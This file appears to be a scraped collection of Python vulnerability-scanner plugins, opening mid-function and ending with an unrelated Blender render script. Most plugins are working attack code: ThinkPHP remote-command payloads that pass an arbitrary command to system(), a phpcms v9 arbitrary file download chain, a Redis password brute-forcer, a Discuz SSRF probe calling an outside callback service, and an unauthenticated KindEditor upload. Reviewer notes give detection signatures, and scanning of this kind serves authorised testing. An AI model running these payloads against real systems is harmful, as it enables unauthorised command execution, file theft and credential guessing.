                        res2 = curl('post', url=url2, data=_data1,headers = headers)
                        if res2 != None:
                            for cookie in res2.cookies:
                                if '_att_json' in cookie.name:
                                    att_json = cookie.value

                                    # Step 3: request the download page for that token.
                                    url3 = data['base_url'] + path +"index.php?m=content&c=down&a=init&a_k=" + att_json
                                    res3 =  curl('get', url3,headers = headers)

                                    if res3 !=None:
                                        # Step 4: follow the first link on the page.
                                        file = re.findall(r'<a href="(.+?)"', res3.text)[0]
                                        url4 =  data['base_url'] + path + 'index.php' + file
                                        res4 = curl('get', url4,headers = headers)
                                        if res4 !=None:
                                            if  '<?php' in res4.text:
                                                data['flag'] = 1
                                                data['data'].append({"url": url4})
                                                data['res'].append({"info": url1, "key": "phpcms v9 download",'connect':res4.text})
                                                return data
    return data
예제 #18
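def prove(data):
    """Collect ICP registration records for the domains behind ``target_host``.

    ``_initdic`` returns the working dict. When its ``flag`` entry is truthy,
    three lookup helpers are asked for domains of the host; otherwise the host
    itself is used as the only domain. Each domain is then passed to the ICP
    helpers in order, stopping at the first helper that reports success.
    Every entry of ``dic['ICP']`` is appended to ``data['res']``.

    When the domain lookups fail, ``dic['domain']`` is replaced by the marker
    string "Curl Failed". That marker is kept for callers, but it is no longer
    iterated: looping over the string would pass its single characters to the
    ICP helpers as if they were domains, causing pointless outbound requests.

    Args:
        data: scan context; ``target_host`` and ``id`` are read here.

    Returns:
        The same ``data`` dict, with ``flag`` set to 1 and one ``res`` entry
        per ICP record when any record was found.
    """
    data = init(data, 'api')
    dic = _initdic(data['target_host'], data['id'])
    if dic['flag']:
        dic = _byaizhan(data['target_host'], dic)
        dic = _bychinaz(data['target_host'], dic)
        dic = _by114best(data['target_host'], dic)
        if not dic['flag']:
            dic['domain'] = "Curl Failed"
    else:
        dic['domain'].append(data['target_host'])

    # Skip the failure marker; only a real collection of domains is queried.
    domains = [] if isinstance(dic['domain'], str) else dic['domain']
    for domain in domains:
        dic, found = _ICPbybeianbeian(domain, dic)
        if not found:
            dic, found = _ICPbyaizhan(domain, dic)
        if not found:
            dic, found = _ICPsobeian(domain, dic)

    if dic['ICP']:
        data['flag'] = 1
        for _icp in dic['ICP']:
            data['res'].append({"info": _icp.strip('\r'), "key": "icp"})
    return data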
예제 #19
def prove(data):
    """Test a Redis instance against a password dictionary.

    Passwords come from ``data['d1']`` when present, otherwise from
    ``dict/redis_passwords.txt``. For each entry a connection pool is created
    and ``INFO`` is issued; the function returns on the first password for
    which ``INFO`` succeeds.

    Reviewer notes:
    - The working password and the full ``INFO`` output are stored in
      ``data``; handle scan output as sensitive.
    - The timeouts are commented out, so each attempt uses the client's
      default connection behaviour.
    - A connection pool is created per attempt and never disconnected.
    - Every failure is swallowed, so network errors and rejected passwords
      look the same to the caller.
    - Server side, this is a run of failed ``AUTH`` attempts from one source;
      a long random password or ACLs plus network restrictions are the
      relevant controls.
    """
    data = init(data, "redis")
    # NOTE(review): the dictionary is read before reachability is checked.
    passworddic = _read_dic(data['d1']) if 'd1' in data.keys() else _read_dic(
        'dict/redis_passwords.txt')
    if _socket_connect(data['target_host'], data['target_port']):
        for password in passworddic:
            try:
                password = password.strip('\r').strip('\n')
                # ,socket_connect_timeout=data['timeout'],socket_timeout=data['timeout']
                pool = redis.ConnectionPool(host=data['target_host'],
                                            password=password,
                                            port=data['target_port'])
                r = redis.Redis(connection_pool=pool)
                # INFO is the call that actually exercises the credentials.
                info = r.info()
                data['flag'] = 1
                data['data'].append({"password": password})
                data['res'].append({
                    "info": password,
                    "key": password,
                    "redis_info": info
                })
                return data
            except:
                pass

    return data
def prove(data):
    """Check a Discuz ``wechat`` plugin endpoint for server-side request forgery.

    Requests ``plugin.php?id=wechat:wechat&ac=wxregister`` with the ``avatar``
    parameter set to a value obtained from ``ceye_dns_api()`` and a random
    eight-letter ``wxopenid``, waits three seconds, and records a hit when
    ``ceye_verify_api`` reports an HTTP callback for that value.

    Reviewer notes:
    - Confirmation is out of band, so it only works when the target can reach
      the callback service; egress filtering on the web server both blocks the
      issue's impact and hides it from this check.
    - Requests to ``ac=wxregister`` whose ``avatar`` parameter points at an
      external host are the signature to alert on.
    - ``curl`` is called outside any ``try``; whether it can raise is not
      visible here.
    """
    init(data, 'discuz')
    if data['base_url']:
        dns = ceye_dns_api()
        # ``random.choice`` only makes the id unique per run; it is not a secret.
        url = data[
            'base_url'] + "plugin.php?id=wechat:wechat&ac=wxregister&username=vov&avatar=%s&wxopenid=%s" % (
                dns, ''.join(
                    [random.choice(ascii_lowercase) for _ in range(8)]))
        res = curl('get', url)
        if res != None:
            # Give the target time to make the outbound request.
            time.sleep(3)
            if ceye_verify_api(dns, 'http'):
                data['flag'] = 1
                data['data'].append({"flag": url})
                data['res'].append({"info": url, "key": "discuz x3.4 ssrf"})
    return data
def prove(data):
    """Check ThinkPHP entry points for the ``_method=filter`` function-call issue.

    Posts ``c=phpinfo&f=1&_method=filter`` and ``c=var_dump&f=1&_method=filter``
    to ``index.php`` under ``public/`` and the site root. A hit is recorded
    when the response contains 'PHP Version' or 'string(8) "var_dump"'.

    Reviewer notes:
    - Both probes call harmless functions, and the check reads the function's
      output rather than a status code, which keeps false positives low.
    - ``break`` leaves only the inner loop, so the second path is still
      probed after a hit and can add a second result entry.
    - Form bodies combining ``_method=filter`` with a ``c=`` function name are
      the signature to alert on.
    """
    init(data,'thinkphp')
    if data['base_url']:
        headers ={}
        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        for path in ['public/','']:
            for poc in ['c=phpinfo&f=1&_method=filter',
                        'c=var_dump&f=1&_method=filter']:
                url = data['base_url'] + path + 'index.php'
                res = curl('post', url, data=poc,headers=headers)
                if res != None :
                    if 'PHP Version' in res.text or 'string(8) "var_dump"' in res.text:
                        data['flag'] = 1
                        data['data'].append({"flag": url})
                        data['res'].append({"info": url, "key": "thinkphp 51~52_getshell"})
                        break
    return data
예제 #22
def prove(data):
    """Check whether KindEditor's ``upload_json.php`` accepts an unauthenticated upload.

    Uploads a small file named ``mytestforyou.html`` to
    ``kindeditor/php/upload_json.php?dir=file`` and records a hit when the
    JSON reply has a ``url`` field containing 'kindeditor'.

    Reviewer notes:
    - The check is not read-only: on an affected host the uploaded file stays
      on the server. Its name is an indicator to search for in the upload
      directory.
    - ``json.loads`` is given ``curl``'s return value directly. If that is a
      response object rather than text (confirm against ``curl``), it raises
      TypeError, the bare ``except`` swallows it, and the check never reports
      a hit.
    - An upload handler that accepts ``.html`` from anonymous users allows
      content to be hosted on the site's origin; restrict the handler to
      authenticated users and an allow-list of extensions.
    """
    init(data, 'kindeditor')
    if data['base_url']:
        try:
            url = data['base_url'] + "kindeditor/php/upload_json.php?dir=file"
            files = {
                "imgFile":
                ('mytestforyou.html', "this is a test for you. ", "text/plain")
            }
            res = json.loads(curl('post', url, files=files))
            if 'url' in res.keys() and 'kindeditor' in res['url']:
                data['flag'] = 1
                data['data'].append({"url": url})
                data['res'].append({"info": url, "key": url})
        except:
            pass
    return data
예제 #23
def exec(data):
    """Post a ``_method=__construct`` form carrying ``data['cmd']`` to ThinkPHP.

    The body is sent to ``index.php?s=captcha`` under ``public/`` and the site
    root; every response with status 500 is recorded as a hit together with
    its text.

    Reviewer notes:
    - A 500 status is the only success criterion, so any unrelated server
      error is reported as a hit; treat results as unconfirmed.
    - Form bodies containing ``_method=__construct`` together with
      ``filter[]=`` and ``server[REQUEST_METHOD]=`` are the signature to
      alert on.
    - The function name shadows the builtin ``exec``.
    """
    init(data, 'web')
    if data['base_url']:
        headers = {}
        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        # The command is URL-encoded before it is placed in the form body.
        poc = '_method=__construct&method=get&filter[]=system&server[REQUEST_METHOD]=%s' % parse.quote_plus(
            data['cmd'])
        for path in ['public/', '']:
            for pocpath in ['index.php?s=captcha']:
                url = data['base_url'] + path + pocpath
                res = curl('post', url, data=poc, headers=headers)
                if res != None and res.status_code == 500:
                    data['flag'] = 1
                    data['data'].append({"flag": url})
                    data['res'].append({
                        "info": res.text,
                        "key": "thinkphp 5.0.23 getshell"
                    })
    return data
예제 #24
def prove(data):
    """Fetch ``data['url']`` and report dictionary keywords found in the page.

    Every entry of the keyword dictionary (``data['dic_one']`` or
    ``dict/web_content_key.txt``) that occurs in the response text is
    collected. When at least one keyword matched, one result entry with the
    page title, the matched keywords and the HTTP status is appended.

    Reviewer notes:
    - ``codes.append(type)`` appends the builtin ``type``, not an encoding
      name. It is the last list element, so ``decode`` always fails on it.
    - The ``finally`` clause runs on every iteration, including the one that
      ends in ``break``. If decoding only succeeds at the last index, the
      decoded title is overwritten by '[Error Code]'.
    - When ``result.encoding`` is None, ``title`` is left as ``title.string``
      (text, not bytes) and every ``decode`` attempt fails.
    - ``data['flag']`` is read at the end without being set here when nothing
      matched; this relies on ``init`` providing the key (confirm).
    """
    data = init(data,'web')
    if data['url']:
        result = curl('get', data['url'])
        if result != None:
            status = result.status_code

            # Text: collect every dictionary keyword present in the body.
            webkeydic = _read_dic(data['dic_one']) if 'dic_one' in data.keys() else  _read_dic('dict/web_content_key.txt')
            content = result.text
            key = ''
            for searchkey in webkeydic:
                # Dictionary entries are decoded from bytes here.
                searchkey = str(searchkey, 'utf-8').replace("\r", "").replace("\n", "")
                try:
                    if searchkey in content:
                        key += searchkey + ','
                        data['flag'] = 1
                except Exception as e:
                    print(e)
                    pass

            # title: extract it and try a list of encodings on it.
            soup = BeautifulSoup(result.text, "html5lib")
            if soup != None:
                codes = ['utf-8', 'gbk']
                title = soup.title
                if title == None or title.string == '':
                    title = "[None Title]".encode('utf-8')
                else:
                    if result.encoding != None:
                        try:
                            title = title.string.encode(result.encoding)
                            codes.append(result.encoding)
                        except:
                            title = "[Error Code]".encode('utf-8')
                    else:
                        title = title.string
                # NOTE(review): appends the builtin ``type``; see the docstring.
                codes.append(type)
                for j in range(0, len(codes)):
                    try:
                        title = title.decode(codes[j]).strip().replace("\r", "").replace("\n", "")
                        break
                    except:
                        continue
                    finally:
                        # Runs on break as well as on continue.
                        if j + 1 == len(codes):
                            title = '[Error Code]'
            else:
                title = '[None Title]'

            if data['flag'] == 1:
                # key[:-1] drops the trailing comma.
                data['res'].append({"info": title, "key": key[:-1], "status": status})

    return data
예제 #25
def prove(data):
    """Probe an IIS host for 8.3 short-name (tilde) enumeration.

    Two wildcard requests are issued through ``_get_status``: one whose
    pattern is meant to match an existing short name and one whose
    random-looking prefix should match nothing. A 404 for the first
    together with anything other than 404 for the second is treated as a
    positive and recorded under the key ``iis_short_file``.

    NOTE(review): the verdict rests only on the two status codes, so custom
    error pages or a filtering proxy can skew it; confirm findings manually.
    The usual hardening is to disable 8.3 name creation on the volume
    (``NtfsDisable8dot3NameCreation``) and to filter ``~`` in request paths.

    Returns the (possibly updated) ``data`` dict produced by ``init``.
    """
    data = init(data, 'iis')
    base = data['base_url']
    if not base:
        return data

    wildcard_path = '/*~1*/a.aspx'
    # Broad pattern: expected to hit some existing file or folder.
    matching_status = _get_status(base + wildcard_path)
    # Control pattern: the prefix should not correspond to anything on disk.
    control_status = _get_status(base + '/l1j1e*~1*/a.aspx')

    if matching_status == 404 and control_status != 404:
        data['flag'] = 1
        data['data'].append({"url": base + wildcard_path})
        data['res'].append({"info": wildcard_path, "key": 'iis_short_file'})

    return data
예제 #26
def prove(data):
    """Check whether a ThinkPHP application evaluates a routed function call.

    Each probe asks the framework to invoke ``phpinfo`` through the ``s``
    routing parameter; the check is positive when the response body contains
    the ``PHP Version`` banner. Both the site root and ``public/`` are tried.

    For defenders: requests whose ``s`` parameter contains
    ``\\think\\app/invokefunction`` or ``\\think\\request/cache`` are the
    indicator to look for in access logs. A positive result means the
    framework needs a vendor-fixed release.

    The ``break`` only leaves the inner loop, so a host that answers under
    both path prefixes is recorded once per prefix.

    Returns ``data`` with ``flag``, ``data`` and ``res`` updated on a hit.
    """
    init(data, 'thinkphp')
    base = data['base_url']
    if not base:
        return data

    probes = (
        "index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",
        "index.php?s=/index/\\think\\request/cache&key=1|phpinfo",
    )
    for prefix in ('', 'public/'):
        for probe in probes:
            target = base + prefix + probe
            resp = curl('get', target)
            # No response, or no phpinfo banner: try the next probe.
            if resp is None or 'PHP Version' not in resp.text:
                continue
            data['flag'] = 1
            data['data'].append({"flag": target})
            data['res'].append({
                "info": target,
                "key": "thinkphp 5.1.31 getshell"
            })
            break
    return data
예제 #27
def exec(data):
    """Send ``data['cmd']`` through the two ThinkPHP routing payloads.

    The command is URL-encoded with ``parse.quote_plus`` and placed into
    both payloads; every combination of path prefix and payload is
    requested, and each response with status 200 is recorded.

    NOTE(review): status 200 alone does not show that anything ran on the
    server; an application that answers 200 for unknown routes produces
    a false positive for every request, so findings need manual review.
    NOTE(review): the full response body is stored in ``res`` and may hold
    command output; treat stored findings as sensitive.
    NOTE(review): the function name shadows the builtin ``exec`` inside this
    module.

    Returns ``data`` with ``flag``, ``data`` and ``res`` updated per hit.
    """
    init(data, 'web')
    base = data['base_url']
    if not base:
        return data

    # Encode once; quote_plus is deterministic, so both payloads get the
    # same value the original computed twice.
    encoded_cmd = parse.quote_plus(data['cmd'])
    payloads = (
        "index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%s"
        % encoded_cmd,
        "index.php?s=/index/\\think\\request/cache&key=%s|system" % encoded_cmd,
    )
    for prefix in ('', 'public/'):
        for payload in payloads:
            target = base + prefix + payload
            resp = curl('get', target)
            if resp is None or resp.status_code != 200:
                continue
            data['flag'] = 1
            data['data'].append({"flag": target})
            data['res'].append({
                "info": resp.text,
                "key": "thinkphp 5.1.31 getshell"
            })
    return data
예제 #28
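def prove(data):
    """Record the methods a server advertises in reply to an OPTIONS request.

    An OPTIONS request is sent to ``<base_url>/testbyme``; when the response
    carries an ``Allow`` header, its value is stored under the key
    ``OPTIONS``.

    The finding is informational: the presence of ``Allow`` is not a
    weakness by itself. Whoever reads the report should look at the
    recorded value for methods the application does not need (for example
    PUT, DELETE or TRACE).

    Returns the ``data`` dict produced by ``init``, updated on a hit.
    """
    data = init(data, 'web')
    if data['base_url'] is None:
        return data
    try:
        res = curl('options', data['base_url'] + "/testbyme")
        # A missing response or a missing header is simply "no finding";
        # handle both explicitly instead of relying on an exception.
        if res is not None and 'Allow' in res.headers:
            allow = res.headers['Allow']
            data['flag'] = 1
            data['data'].append({"method": "options"})
            data['res'].append({"info": allow, "key": "OPTIONS"})
    except Exception:
        # Best-effort probe: transport errors must not abort the scan.
        # Narrowed from a bare ``except`` so that KeyboardInterrupt and
        # SystemExit still stop the scanner.
        pass
    return data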
예제 #29
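def prove(data):
    """Audit the cookie attributes and security headers of ``data['url']``.

    One GET request is made. Cookie attributes are read from the
    ``Set-Cookie`` response header, and a finding is added through ``_plus``
    for each missing attribute or header.

    Fixes over the previous version, whose cookie branch could never run
    to completion:
      * cookies were looked up under a header named ``cookies``; servers
        send them in ``Set-Cookie``;
      * a trailing comma turned the cookie string into a tuple, so the
        first regex call raised and the bare ``except`` hid every later
        check;
      * the ``findall`` calls were given the header mapping instead of the
        cookie string;
      * ``Secure``/``HttpOnly``/``Domain``/``Path`` were only matched when
        followed by ``;``, so an attribute at the end of a cookie was
        missed.

    Limitations (NOTE(review)): header names are looked up in lower case,
    which assumes ``curl`` returns a case-insensitive mapping; when several
    cookies are set, the values are assumed to be joined into one string,
    so the Secure/HttpOnly checks are per response, not per cookie.

    Returns the ``data`` dict produced by ``init`` with findings added.
    """
    import re  # local import: the file's import block is not in view

    data = init(data, 'web')
    if not data['url']:
        return data
    try:
        res = curl('get', data['url'])
        if res is None:
            return data
        headers = res.headers

        cookies = headers.get('set-cookie')
        if cookies:
            # Attributes follow "; " and end at ";", at "," (next cookie)
            # or at the end of the header value.
            if not re.search(r';\s*secure\s*(?:[;,]|$)', cookies, re.I):
                data = _plus(data, 'Cookie without Secure flag set')
            if not re.search(r';\s*httponly\s*(?:[;,]|$)', cookies, re.I):
                data = _plus(data, 'Cookie without HttpOnly flag set')

            domain = re.findall(r';\s*domain=([^;,\s]+)', cookies, re.I)
            if domain:
                data = _plus(
                    data,
                    'Session Cookie are valid only at Sub/Domain: %s' %
                    domain[0])

            path = re.findall(r';\s*path=([^;,\s]+)', cookies, re.I)
            if path:
                data = _plus(
                    data,
                    'Session Cookie are valid only on that Path: %s' %
                    path[0])

            # Collect distinct cookie names, skipping name=value attributes.
            # NOTE(review): "multiple cookies" is read here as "more than
            # one distinct cookie name"; confirm that is the intended rule.
            attribute_names = {'domain', 'path', 'expires', 'max-age',
                               'samesite'}
            cookie_names = set()
            for part in re.split(r'[;,]', cookies):
                name, sep, _value = part.partition('=')
                name = name.strip()
                if sep and name and name.lower() not in attribute_names:
                    cookie_names.add(name)
            if len(cookie_names) > 1:
                data = _plus(data, 'Cookie Header contains multiple cookies')

        # X-XSS-Protection is deprecated in current browsers; the check is
        # kept for compatibility. Content-Security-Policy is not examined.
        if 'x-xss-protection' not in headers:
            data = _plus(data, 'X-XSS-Protection header missing',
                         'x-xss-protection')
        if 'x-frame-options' not in headers:
            data = _plus(data,
                         'Clickjacking: X-Frame-Options header missing',
                         'x-frame-options')
        if 'content-type' not in headers:
            data = _plus(data, 'Content-Type header missing',
                         'content-type')
        # HSTS is only honoured on HTTPS responses; this check does not
        # look at the URL scheme, so plain-HTTP targets are always flagged.
        if 'strict-transport-security' not in headers:
            data = _plus(data, 'Strict-Transport-Security header missing',
                         'strict-transport-security')
        if 'x-content-type-options' not in headers:
            data = _plus(data, 'X-Content-Type-Options header missing',
                         'x-content-type-options')
    except Exception:
        # Best-effort audit: a transport or parsing error must not abort
        # the scan. Narrowed from a bare ``except`` so KeyboardInterrupt
        # and SystemExit still propagate.
        pass
    return data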
예제 #30
def prove(data):
    """Check whether a ThinkPHP application lets a form body pick a filter.

    Two form bodies are posted to ``index.php?s=captcha`` under ``public/``
    and under the site root. The first asks for ``phpinfo``, the second for
    ``var_dump`` of a marker string; the check is positive when the response
    contains the ``PHP Version`` banner or the dumped marker.

    For defenders: POST bodies carrying ``_method=__construct`` together
    with ``filter[]=`` are the indicator to look for. A positive result
    means the framework needs a vendor-fixed release.

    The ``break`` only leaves the inner loop, so a host that answers under
    both path prefixes is recorded once per prefix.

    Returns ``data`` with ``flag``, ``data`` and ``res`` updated on a hit.
    """
    init(data, 'thinkphp')
    base = data['base_url']
    if not base:
        return data

    form_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    bodies = (
        '_method=__construct&method=get&filter[]=phpinfo&server[REQUEST_METHOD]=1',
        '_method=__construct&method=get&filter[]=var_dump&server[REQUEST_METHOD]=this_is_a_test',
    )
    # Either marker in the body shows the requested function produced output.
    markers = ('PHP Version', 'string(14) "this_is_a_test"')

    for prefix in ('public/', ''):
        target = base + prefix + 'index.php?s=captcha'
        for body in bodies:
            resp = curl('post', target, data=body, headers=form_headers)
            if resp is None:
                continue
            if any(marker in resp.text for marker in markers):
                data['flag'] = 1
                data['data'].append({"flag": target})
                data['res'].append({
                    "info": target,
                    "key": "thinkphp 5.0.23 getshell"
                })
                break
    return data
예제 #31
import bpy, sys, os

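# Load bootstrapConfig.py from the current working directory and run it in
# this module's namespace. The rest of the script reads ``params``, which is
# presumably defined by that file.
# NOTE(review): exec() runs whatever the file contains with the privileges
# of the Blender process. Anyone who can write bootstrapConfig.py, or who
# controls the working directory, controls what runs here; keep the file and
# directory writable only by the account that runs the renderer.
filename = os.getcwd()+'/bootstrapConfig.py'
# Read through a context manager so the file handle is closed promptly
# (the previous open(...).read() left it to the garbage collector).
with open(filename) as config_file:
    config_source = config_file.read()
exec(compile(config_source, filename, 'exec'))

# Make the selected title's directory importable.
# NOTE(review): __Category and __TitleName are concatenated into the path
# unchecked; if they can come from user input, reject values containing
# path separators or ".." before using them.
sys.path.append(os.getcwd()+"/../Titles/"+params['__Category']+"/"+params['__TitleName'])

# Configure the render output. '//' is Blender's blend-file-relative prefix.
# NOTE(review): __OutFileName is likewise used unchecked in the output path.
bpy.data.scenes[0].render.filepath = '//../../../Output/'+params['__OutFileName']+'.avi'
bpy.data.scenes[0].render.resolution_percentage = int(params['__Resolution'])
bpy.data.scenes[0].render.image_settings.file_format = 'AVI_JPEG'

# Import the title script (found via the sys.path entry added above) and
# hand the parameters to it.
import script
script.init(params)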